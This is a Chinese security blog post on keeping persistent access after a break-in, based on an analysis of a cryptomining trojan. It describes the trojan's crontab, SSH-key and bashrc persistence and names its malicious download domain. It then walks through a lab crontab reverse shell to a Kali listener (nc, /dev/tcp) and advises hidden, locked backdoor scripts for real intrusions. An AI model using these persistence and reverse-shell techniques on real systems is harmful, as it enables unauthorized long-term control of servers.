请选择 进入手机版 | 继续访问电脑版
 找回密码
 立即注册
发布
  • QQ空间
  • 回复
  • 收藏

从挖矿木马看后渗透维权

2019-10-9 12:38

No.1

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.2

前言

在通过漏洞打入对方服务器后,如果痕迹没有清除干净或者在实施侵入的同时会有防火墙、waf(某云盾)等安全产品发出警报,比如某云服务器会直接发送邮件告知管理员,服务器被一个陌生IP登录,这时管理员可能会警觉,可能最直接的方式就是将22、3389等端口放入内网或直接关闭,如果想要获取对方长久的控制权,我们需要在其服务器中埋下稳定的后门,比如通过定时任务 crontab 反弹 shell,启发来源于挖矿脚本。

No.3

挖矿木马分析结果

阶段1

1.关闭防火墙和selinux。

2.释放掉被系统Cache占用的数据:sync && echo 3 >/proc/sys/vm/drop_caches,获得更多计算资源。

这里是矿机的CPU占用情况

从挖矿木马看后渗透维权

3.配置crond定时任务以及授权密钥的路径。

4.定义一些变量,扰乱系统程序,干扰其它挖矿程序。

5.配置定时更新木马的文件,比如sysupdate,update.sh。

从挖矿木马看后渗透维权

通过威胁情报平台确认de.gsearch.com.de域名为攻击者散播挖矿脚本的恶意域名。

从挖矿木马看后渗透维权

阶段2

ps获取运行的进程,grep屏蔽掉自己,然后grep其它挖矿程序,awk获取进程编号,kill -9 强制杀掉。

从挖矿木马看后渗透维权

阶段3

定义一个函数,调用curl,wget远程下载挖矿脚本。

从挖矿木马看后渗透维权

阶段4

定时写入公钥,实现免密登录。

从挖矿木马看后渗透维权

阶段5

给木马文件加锁,防止被修改或者删除

从挖矿木马看后渗透维权

阶段6

修改防火墙配置。

从挖矿木马看后渗透维权

阶段7

清理入侵痕迹。

从挖矿木马看后渗透维权

阶段8

劫持系统进程以及命令(比如ls,cd等常用命令,后期还会劫持sshd)。

从这个阶段开始分析服务器中存在的另外一个挖矿脚本,可以看出本人通过crontab -r 后任然无法删除定时任务,这里可能有两种原因:

1.有其他定时任务还在不断写入下载挖矿脚本的命令。

2.系统命令和系统进程被劫持,一旦被劫持的系统进程或命令生效,挖矿木马再次激活。

从挖矿木马看后渗透维权

通过busybox尝试恢复被劫持的系统命令和进程后,重启服务器,重新登录服务器后依然有病毒进程被拉起,怀疑登录时加载的服务存在问题,最后终于发现/etc/bashrc 存在挖矿木马下载命令。

从挖矿木马看后渗透维权

/etc/bashrc:为每一个运行bash shell的用户执行此文件,当bash shell被打开时,该文件被读取。所以重启后,挖矿脚本会继续下载

网上资料的搜集(关于该类型挖矿木马的感染过程):

主进程操作

1.添加至开机启动,以及/etc/bashrc

2.生成了sshd文件 劫持sshd服务

3.将netdns文件设置为开机启动

4.编译libcryptod.c为/usr/local/lib/libcryptod.so

5.预加载动态链接库,恶意hook关键系统操作函数

6.修改/etc/cron.d/root文件,增加定时任务

7.拉起khugepageds挖矿进程。

No.4

笔者的辛酸删马环节

从挖矿木马看后渗透维权

1.Ubuntu16.04写入定时任务反弹shell

测试环境

攻击机:kali-linux-2019.3,IP:192.168.101.153

靶机:Ubuntu16.04LTS,IP:192.168.101.142

2.测试时出现的问题:

crontab -e写入反弹shell,kali攻击机nc -lvvp 8888一直接收不到连接,service cron status,报错:

CRON: pam_unix(cron:session): session opened for user root by (uid=0)

CRON: pam_unix(cron:session): session closed for user root

从挖矿木马看后渗透维权

解决:vi /etc/pam.d/common-session-noninteractive

在session required pam_unix.so

上方添加以下内容:

session [success=1 default=ignore] pam_succeed_if.so service in cron quiet use_uid

从挖矿木马看后渗透维权

service cron restart

service cron status(报错已解决,但是kali任然无法收到反弹shell)

好像有错误信息:CRON[3901]: (CRON) info (No MTA installed, discarding output)

从挖矿木马看后渗透维权

第一种方法:sudo apt-get install postfix

从挖矿木马看后渗透维权

报错没有了,但是还是接收不到shell

换第二种方法

首先修改一下计划任务

从挖矿木马看后渗透维权

然后我们过一分钟去文件error.txt查看报错信息

从挖矿木马看后渗透维权

该错误信息的意思大概是:/bin/bash没有被找到,bash后面的”>& /dev/tcp/…”被当作系统文件或目录了,并没有通过binbash命令执行。linux里面的cron中命令执行的shell环境是/bin/sh,我们看一下/bin/sh文件的属性,发现/bin/sh其实是一个软连接,指向dashshell。

从挖矿木马看后渗透维权

从挖矿木马看后渗透维权

Ubuntu6.10已将先前默认的bashshell更换为了dashshell。Debian和Ubuntu中,/bin/sh默认已经指向dash,这是一个不同于bash的shell,它主要是为了执行脚本而出现,而不是交互,它速度更快,但功能相比bash要少很多,语法严格遵守POSIX标准。因为缺少了binbash的交互特性,所以kali中弹不回shell可以得到很好的解释了。

1.如果是 Dash 可用以下方法切回 Bash

方法一:修改默认脚本解释语言为bash

sudo dpkg-reconfigure dash(选择 NO)

从挖矿木马看后渗透维权

$ sudo dpkg-reconfigure dash

Removing 'diversion of /bin/sh to /bin/sh.distrib by dash'

Adding 'diversion of /bin/sh to /bin/sh.distrib by bash'

Removing 'diversion of /usr/share/man/man1/sh.1.gz to /usr/share/man/man1/sh.distrib.1.gz by dash'

Adding 'diversion of /usr/share/man/man1/sh.1.gz to /usr/share/man/man1/sh.distrib.1.gz by bash'

然后ls -l /bin/sh确认软连接指向bashshell即可,我采取的是第二种方式。

方法二:直接修改sh的软链接为bash。

sudo ln -fs /bin/bash /bin/s

从挖矿木马看后渗透维权

此时kali正常弹回shell:

从挖矿木马看后渗透维权

此外,除了通过crontab -e直接写入bash之外,我们还可以通过创建定时文件/etc/crontabshell,然后通过crontab -e调用该shell脚本:

* * * * * /etc/crontabshell,

crontab -e

从挖矿木马看后渗透维权

vi /etc/crontabshell

从挖矿木马看后渗透维权

chmod 777 /etc/crontabshell

此时kali再次弹回shell:

No.5

实战中的应用

真实的渗透环境中,我们可以调用多个文件去执行反弹shell,你也可以设置隐藏属性的shell脚本文件,或者alias劫持一些系统命令,给定时文件加锁。结合挖矿木马的特性,可达到不死马的效果。

No.6

招聘启事

安全招聘

————————

公司:安恒信息

岗位:Web安全 安全研究员

部门:安服战略支援部

薪资:13-30K

工作年限:1年+

工作地点:杭州(总部),广州

岗位剩余编制:3人

工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…

【岗位职责】

1.定期面向部门、全公司技术分享;

2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;

3.负责完成部门渗透测试、红蓝对抗业务;

4.负责自动化平台建设

5.负责针对常见WAF产品规则进行测试并落地bypass方案

【岗位要求】

1.至少1年安全领域工作经验;

2.熟悉HTTP协议相关技术

3.拥有大型产品、CMS、厂商漏洞挖掘案例;

4.熟练掌握php、java、asp.net代码审计基础(一种或多种)

5.精通Web Fuzz模糊测试漏洞挖掘技术

6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法

7.有过独立分析漏洞的经验,熟悉各种Web调试技巧

8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)

【加分项】

1.具备良好的英语文档阅读能力;

2.曾参加过技术沙龙担任嘉宾进行技术分享;

3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;

4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;

5.开发过安全相关的开源项目;

6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;

7.个人技术博客;

8.在优质社区投稿过文章;

岗位:安全红队武器自动化攻城狮

薪资:13-30K

工作年限:2年+

工作地点:杭州(总部)

【岗位职责】

1.负责红蓝对抗中的武器化落地与研究;

2.平台化建设;

3.安全研究落地。

【岗位要求】

1.熟练使用Python、java、c/c++等至少一门语言作为主要开发语言;

2.熟练使用Django、flask 等常用web开发框架、以及熟练使用mysql、mongoDB、redis等数据存储方案;

3:熟悉域安全以及内网横向渗透、常见web等漏洞原理;

4.对安全技术有浓厚的兴趣及热情,有主观研究和学习的动力;

5.具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】

1.有高并发tcp服务、分布式等相关经验者优先;

2.在github上有开源安全产品优先;

3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;

4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;

5.具备良好的英语文档阅读能力。

设计师

————————

【职位描述】

负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。

【职位要求】

1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;

2、有良好的美术功底,审美能力和创意,色彩感强;精通photoshop/illustrator/coreldrew/等设计制作软件;

3、有品牌传播、产品设计或新媒体视觉工作经历;

【关于岗位的其他信息】

企业名称:杭州安恒信息技术股份有限公司

办公地点:杭州市滨江区安恒大厦19楼

学历要求:本科及以上

工作年限:1年及以上,条件优秀者可放宽

简历投递至 strategy@dbappsecurity.com.cn

安恒雷神众测SRC运营(实习生)

————————

【职责描述】

1. 负责SRC的微博微信公众号等线上新媒体的运营工作,保持用户活跃度,提高站点访问量;

2. 负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作,促进审核人员与白帽子之间友好协作沟通;

3. 参与策划、组织和落实针对白帽子的线下活动,如沙龙、发布会、技术交流论坛等;

4. 积极参与雷神众测的品牌推广工作,协助技术人员输出优质的技术文章;

5. 积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。

【任职要求】

1. 责任心强,性格活泼,具备良好的人际交往能力;

2. 对网络安全感兴趣,对行业有基本了解;

3. 良好的文案写作能力和活动组织协调能力。

【工作地点】

杭州、广州

简历投递至 strategy@dbappsecurity.com.cn

从挖矿木马看后渗透维权

专注渗透测试技术

全球最新网络攻击技术

END
文章点评
相关新闻